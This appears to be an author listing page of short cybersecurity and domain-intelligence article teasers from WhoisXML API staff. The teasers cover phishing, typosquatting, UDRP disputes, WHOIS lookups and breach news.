The business world has seemingly divided views on content filtering. Some say that the tactic is too restrictive, while others opine that it can help in a lot of ways. Building on the latter perspective, in an age when the Internet has become a breeding ground for almost anything. more
Melissa, what many consider to be the first malspam campaign, emerged in 1999. Once successfully installed, the "mass-mailing" virus forwarded copies of itself to the first 50 email addresses on a victim's contact list. While the malware wasn't as dangerous as current variants, it could still effectively max out network resources, resulting in downtime. more
Fighting cybercrime is a never-ending battle. As threat actors continue to craft different ways to attack and scam their target victims, companies need to build their security arsenals to fight against all kinds of threats. What's more, an effective way to achieve cyber resilience is by getting to know the enemy and build attack profiles. more
Typosquatting is a malicious tactic that cyberattackers employ to entrap users who mistype web addresses on their browsers. Often, mistyped domain addresses redirect to copycats of legitimate sites and are owned by threat actors. more
Cyber attacks can hit any organization and even derail its operation on a grand scale. Just recently, ISS World, a facility management service provider with clients in more than 70 countries worldwide, released a statement where it mentions being the victim of a malware attack. more
The Telephone Consumer Protection Act (TCPA) is a federal statute that restricts telemarketers from making automated and unsolicited calls as well as sending faxes and messages to people. Affected individuals may choose to file a complaint and collect a minimum of US$500 for each illegal communication received. more
Phishing attacks continue to post an upward trend. Over the years, phishers have improved their methods, using very convincing domains to bait victims into their schemes. more
Most businesses know the importance of protecting a brand. But, only a few of them understand that protecting their online properties is just as central to their brand-protection strategies. more
Presumptive conclusion or inference suggests that a piece of evidence is authentic based on other facts recognized by the law. When law enforcement and cybersecurity researchers investigate cases, they come across strong evidence that may be insufficient on their own to implicate a victim or move a case forward. more
Phishing keeps making much noise in the realm of cybersecurity, and not in a good way. A majority of cyber attacks start with a phishing email, making the tactic responsible, at least partially, for close to 90% of data breaches. more
IP spoofing is a cyberattack technique that entails using a device or a network to fool users into thinking the attacker is part of a legitimate entity. Often, cybercriminals use this method to access computers in a target network to obtain sensitive information, turn systems into zombies, or launch a denial-of-service (DoS) attack. more
The more popular a brand is, the more customers buy its products. That same popularity makes it a lucrative target for infringers to sell counterfeits. As such, it has become a must for global brands to use brand protection software to make sure their reputation and consumers do not suffer. more
Gone are the days when a single department in an organization shouldered the responsibility for a company's brand protection strategy. A research paper that discussed the future of online brand protection shows that inter-department involvement, starting with the board's approval and support, down to the implementation of the strategy by different departments, is required. more
Typosquatting is also known as "URL hijacking," and for good reason. Just as hijackers unlawfully seize a vehicle, typosquatters take over a domain name and use it for malicious activities. more
Reverse domain name hijacking (RDNH) can be considered a severe threat to any honest-to-goodness small business or your average website owner. more
One of the first go-to resources for law enforcers and cybercrime investigators is the WHOIS database. WHOIS domain search tools such as WHOIS Lookup provide rich information about a particular domain name or IP address. more
When visitors fail to recognize that the site they visit is a fraudulent copy of that of a famous brand, they can expose themselves to cybercrime and other attacks. As part of these attacks, typosquatting is a common technique that hackers use to lure victims. They create websites that very closely resemble that of the brand they are trying to hijack so the victims would not have a clue that it is fake. more
Over the past five years, the Internet has seen the mass migration of websites from HyperText Transfer Protocol (HTTP) to its extension, HTTP Secure (HTTPS). HTTPS is a communication protocol that encrypts the data exchanged between sites and user agents. more
Sometimes, seeing several permutations of a famous company's domain names is not just a mere coincidence. Often, these are typosquatting attempts. They are not merely a nuisance, either, because clicking such a URL can have severe effects. more
Should organizations need to worry about domain look-alikes? The answer is, unfortunately, yes. Threat actors often impersonate popular brands and domains to lure users into visiting malicious pages and divulging their personally identifiable information (PII). more
In a Uniform Domain-Name Dispute-Resolution Policy (UDRP) case, the complainant usually has to prove three elements to win. Failing to satisfy these evidentiary requirements can render the case not only null and void, but the panel may also consider it as a reverse domain name hijacking (RDNH) instance. more
While other organizations also hear Uniform Domain Name Dispute Resolution Policy (UDRP) cases, the World Intellectual Property Organization (WIPO) is the largest. more
The holidays are a bustling time for businesses and, unfortunately, fraudsters too. Travel fraud is rife in the lead up to the festivities, with airline ticket scams taking center stage. According to a report by The Street, airlines lose US$2.4–4.8 billion yearly due to false bookings. Consumers, meanwhile, lose US$283–588 per transaction. more
Cybersquatting is likely one of the oldest digital threats out there, but somehow, it still works. The first cybersquatting case filed after the implementation of the Uniform Domain Name Dispute Resolution Policy (UDRP) involved the domain worldwrestlingfederation[.]com. more
Moving more workloads to the cloud has become a top priority for enterprises. Some 96% of organizations are, in fact, already using cloud computing in one or more areas of their business. Cloud computing benefits enterprises in many ways, but perhaps the driving force behind the increased cloud adoption is this: Organizations that use cloud services grow faster. more
The World Intellectual Property Organization (WIPO) recorded a 12% increase in Uniform Domain-Name Dispute Resolution Policy (UDRP) cases filed in 2018. In fact, WIPO saw a total of 3,447 cases that covered 5,655 domain names. What this implies... more
The legal sector has become a favored target of phishing campaigns. 80% of law firms reportedly received phishing emails in 2018. And in 2017, the success of these phishing campaigns was 300% higher than in 2016. more
Deciding on a domain name is both an exciting and challenging task that every website owner must undertake. A good domain name must sound interesting and be easy to remember while echoing the nature of the business. more
At the most basic level, the Internet consists of interconnected networks that communicate using standard protocols such as the Border Gateway Protocol (BGP) and the Domain Name System (DNS). As such, it is built on trust or an honor system – trust that routing requests received from another network are valid, and the traffic sent in response to requests is legitimate. more
Early this month, the Gekko Group, an AccorHotels subsidiary erroneously uploaded more than 1TB of confidential information on a publicly accessible cloud-based server. This error led to the exposure of tons of data owned by its partner hotels' clients, travel agencies, and customers. more
An attempted ransomware attack on some Louisiana state servers caused the state's cybersecurity team to shut down their IT systems and websites. Governor John Bel Edwards, however, emphasized that not all of the state's servers were affected. more
On November 11, news about the massive data exposure of the clients of Orvis, a 163-year-old retailer, made headlines. Some of the company's login credentials were posted online... With over 80 retail stores, 10 outlets, and hundreds of independent dealers worldwide, we believe potential attackers could get their hands on millions of customer data. more
Cybersquatters can pose severe risks for brands, so it's good news when a company wins against them. Home Box Office, Inc. (HBO) recently won its case in a domain dispute for TrueDetective.com. The titular show has a huge cult following, which explains why someone may want to leverage a domain name around it. more
Earlier this week, a new variant of MegaCortex ransomware was found encrypting files and changing victims' passwords on Windows-based computers. Victims who fail to pay the ransom were as usual threatened that their personal data would be released. How does the attack work? more
On 16 October, Web.com – the world's oldest domain name provider and owner of Network Solutions, NameSecure, and Register.com – disclosed a major breach resulting in the leakage of its customers' personally identifiable information (PII). more
In a world where society is driven by information, data science has gained solid ground over the past years for its ability to separate the wheat from the chaff. Its predictive power is now being explored in the context of cybersecurity. After all, efficient threat protection requires gathering and interpreting the enormous amounts of traffic generated to and from one's network. more
Security orchestration, automation, and response (SOAR) and security information and event management (SIEM) tools share several components and so most security operations teams use the terms interchangeably. more
Technology, for its immense evolution, has now become a significant driver of the economy – both digital and global. Along with developments and innovations such as cloud-based computing and Internet-connected mobile devices, however, cybercrime lurks in the shadows. more
For several years, digital security relied on a simple strategy – gain insight from past events, learn from them, and base security protection accordingly. more
One of the main struggles of organizations is streamlining processes through cost-effective means. This problem is adequately addressed by DevOps, a set of processes that aims to unify development and operations. more
The traditional notion of the security perimeter is growing increasingly problematic in the wake of highly publicized attacks. The perimeter is becoming nonexistent, as cloud-based infrastructures replace legacy systems. more
While it's true that the lines between cybersecurity roles have become blurred, some have more significant barriers to entry. The field of digital forensics and incident response (DFIR), in particular, is an altogether different beast. more
Achieving an ideal organizational network means seamless development, operations, and security. Knowing and achieving that, however, is a great challenge. more
Mitigation and remediation are two words thrown around a lot in cybersecurity, often, interchangeably. While there exists a stark contrast between one and the other, both play a crucial role in security service providers' risk-related decisions. more
Emerging malicious threats are driving the demand for new cybersecurity experts. The rise of ransomware and machine learning (ML)-driven attacks underscores the importance of having the capability to track and prepare to combat such threats. In response, the profession had to adapt quickly by employing staff with the necessary offensive and defensive skills. more
News of a South African ISP's two-day outage sent the industry abuzz last month, highlighting the need for improved distributed denial-of-service (DDoS) attack mitigation. more
In an ideal world, administrators should never run across threats to their web properties. However, human errors and vulnerabilities inevitably get in the way of cybersafety. Managed Domain Name System (DNS) providers, registrars, and services can sometimes put users at immense risk as well. more
The current security landscape calls for intensive monitoring and analysis to effectively identify possible threats to applications, systems, and infrastructure. With millions of threats discovered monthly, security experts must revamp and update their cybersecurity measures and tools. more
Organizations in the cybersecurity industry must make crucial decisions to ensure they do the job right. One of these decisions includes whether to use blacklisting or whitelisting. more
Copyright infringement laws have become less effective due to the ease of sharing content over the Web. Music streaming services, for example, have increased music consumption and the overall industry revenue, but it also has lessened album sales and song downloads. more
Imagine that your registrar informs you the domain you've been eyeing would soon become available for purchase. That's good news. However, your security adviser told you to make sure a domain is threat-free before you buy it. more
If we're to sum up what any domain owner would want to avoid, it would be ending up in anyone's blacklist. Domain blacklisting has detrimental consequences for any business. Actually, it can have the same or similar negative brand effects as you'd see in the aftermath of a data breach or PR incident. more
The Domain Name System (DNS) plays an essential role in resolving IP addresses and hostnames. For organizations, it ensures that users reach the proper sites, servers, and applications. While it's a fundamental base for a functioning Web, the problem is that this system can easily be abused. more
Reverse domain name hijacking is a shady practice that some individuals and organizations carry out. It occurs when a trademark owner makes false claims in an attempt to gain control of a domain that someone else owns. more
Experts in the realm of cybersecurity are continually trying to keep up with the changes in the threat landscape. Even with advanced tools on hand, any IT security professional knows that a data breach can happen at any time. more
Each day, threat actors search for targets whose assets they can compromise for personal gain. Their attacks often use exploit kits that can find gaps in networks that they use to infiltrate and compromise vulnerable systems and applications. more
Cybercriminals aren't always as creative as we think they are. There is a myth about them having a never-ending supply of techniques and tricks up their sleeves. However, many can't be considered as innovators in their shady field. more
The problem of credit card fraud is not set to be resolved anytime soon. On the one hand, detecting and preventing the artifice is one of the most challenging aspects of e-commerce. more
If there's anything we learned about the threat landscape, it's that none of us are safe from malicious actors. Becoming a victim is not a matter of "if" but "when." Enterprises are now aware that the thought of being "too big to fail" is no longer applicable. more
One of the most effective and prevalent ways to reach someone in today's business world remains email. With billions of users worldwide, it is the backbone of business communications. more
There's no denying the fact that many enterprises worldwide use security information and event management (SIEM) software. These products collect, analyze, and create reports on cybersecurity data from the range of systems an organization uses. Some SIEM programs are even capable of stopping attacks in progress as soon as these are detected. more
Outsourcing may not always have had the best connotation. In the context of cybersecurity, however, the activity is a vital one and often even the only real alternative for many small- and medium-sized organizations. more
Fighting off individual threats is challenging enough, but things get complicated, and the results more damaging when organizations face blended threats. The practice of combining security threats such as malware and attack vectors confounds if not overwhelms victims, making them easy prey. more
Although the Internet offers many opportunities, it also comes with a wide variety of issues. Cybercrime is rampant, and not knowing how to navigate the Web safely can lead to severe consequences. Phishing is one of the top concerns for enterprises. And managed security service providers (MSSPs) have decided that URL filtering is one way to resolve the issue. more
Cyber attacks and hacking methodologies are growing in complexity over time. This concern has led many enterprises to look toward more advanced capabilities to enhance their cybersecurity. One solution they have found is utilizing next-generation firewalls. more
The threat landscape is more complicated than it was before. Many organizations are thus starting to weigh their options on how to protect their data best. Amid the persistent cybersecurity skills shortage, companies are wondering if they should turn to outsourced services. more
Detecting and preventing fraud have become in-demand over the years. As such, expectations from fraud solution providers have gone up as well. more
A recent prediction from Cybersecurity Ventures states that the cybersecurity sector is going to have as many as 3.5 million unfilled positions by the year 2021. That is why managed detection and response (MDR) services are now more important than ever. more
Many domain names are registered each day and so become part of the Domain Name System (DNS). In fact, research shows that at least two new registrations are seen per second. Although most of these are done for commercial and other legitimate purposes, not everyone who registers a domain has good intentions. more
Organizations operating a security information and event management (SIEM) solution are struggling with one of the biggest problems in cybersecurity today: false positives. more
Has the world moved on from email marketing? Some might think that email has got nearly obsolete with the rise of social media channels and all the buzz about virtual reality, machine learning, and chatbots that abound. more
In this article, let's take a look at several use cases for the API and talk about why you should start employing it today. more
Threat intelligence is the cornerstone of a mature cybersecurity plan. Staying abreast of the emerging threats and knowing where and when your adversaries are about to strike is a crucial aspect in building organizational cyber defenses. more
Let's start this post on WHOIS database download services with a story. Meet James, a businessman who has just taken an important step in developing the digital presence for his small business by registering a domain name. more
Data, due to increased accessibility and interconnection, has been making the World Wide Web go round. Without your log-in credentials, you can't check your email, see what your friends and family are up to on social media, listen to music or watch movies and your favorite shows on streaming services, book a ride, shop for groceries, or do online transactions. more
The future continues to look bleak as the total amount lost to cybercrime is expected to keep growing. It will, in addition, put incentives for innovation and investment at risk, making cybercrime more profitable than ever. more
Everything important in business needs to be adequately maintained for effective long-term operations. This includes relationships with customers, employees, and partners as well as IT systems and equipment. more
The web has made the world a smaller place by reducing the relevance of location. How so? Anyone, no matter where they are, can now reach out to anyone else with useful information ranging from breaking news events to commercial proposals. more
What keeps CISOs up at night? For hundreds of senior company leaders across countries and industries, the steady growth of cybercrime is one of their biggest concerns. Consequently, organizations spend more money than ever to mitigate the risks and consequences of data breaches, despite a new wave of attacks being on its way as we speak. more
This quote from The Art of War could not be more relevant when we think of today's digital battlefield: "If you know the enemy and know yourself, you need not fear the result of a hundred battles." more
Anyone interested in starting doing business online should have a few essential things ready before rushing head-on, including a memorable name and a potentially profitable business model. more
Journalists, brand specialists, cybersecurity researchers... Everyone wants answers on who does what online, so where can you get the clues you seek? WHOIS data, alongside its databases and related products, can help you find out who's behind the most notorious websites - and possibly the shadiest ones as well. more
All entrepreneurs typically have a single goal in mind - ensuring their company's success -- and that means reaching and getting as many customers as possible. Nowadays, that translates to taking advantage of the data that GPS-enabled devices provides. more
Just when we thought that phishing has run out of its bag of tricks, hackers are changing their tactics. Whereas before the attacks could be generalized and random, this time, they are more targeted, tailored, and personal. What are crooks up to? more
Maintaining an online presence isn't as simple as choosing a name, putting it up, and waiting until things turn out well. Once you're out there, you have to keep an eye on your domain and what's happening around because not doing so could put you at a disadvantage or even in danger. more
Cybersecurity is pretty much a game of "hide and seek" - cybercriminals hide, cybersecurity teams seek -- and the damage is often based on how long the perpetrators are able to continue their attacks without being found. more
The Internet is like a beach - you will most likely leave behind footprints while you are there. And these impressions can be traced back to whoever left them. The same is true with domain ownership. That website name you plan to launch your next venture on? Its domain may have a history of its own. more
A while back, creating malicious software was sort of a hobby for programmers. It was hardly ever used to make money, but more of a way to show off what one can do with a computer. more
As scary as it may seem, everyone is a target on the Web. Worse, your susceptibility to cyber attacks, when not promptly addressed, marks you not just as a target but can even lead others to consider you as a threat. more
Who are the entities behind the domains on the Web? This question has nothing to do with stalking but is critical for various business activities. Domainers, for instance, want this information to negotiate lucrative purchases while journalists might need it to set up interviews or get leads during investigations. more
Do you know where your online customers are? Can you tell whether the right users in your network are all authorized to access its content? Are you able to detect and block suspicious traffic and devices? more
Like it or not but the face of cybersecurity has changed over the past few years and while conventional approach has taken a back seat lately, non-traditional methods are coming to the rescue. more
A career as an information security analyst is one of the top technology jobs nowadays and for a good reason. Billions of dollars are spent every year to fight cybercrime, and companies are now willing to pay top rates for the best talent available. more
The world of marketing and media isn't a walk in the park. The teams working in those departments are always on the move continually looking for ways to improve their strategies. A WHOIS database can prove useful for them in many ways. Read on to find out how. more
Jonathan Zhang
Founder and CEO of WhoisXMLAPI & ThreatIntelligencePlatform.comJoined on Feb 28, 2019
Alexandre Francois
Head of Marketing & Security Researcher at WhoisXML APIJoined on Feb 28, 2019
Alex Ronquillo
Sr. Director of Business Development at WhoisXML API Joined on Feb 28, 2019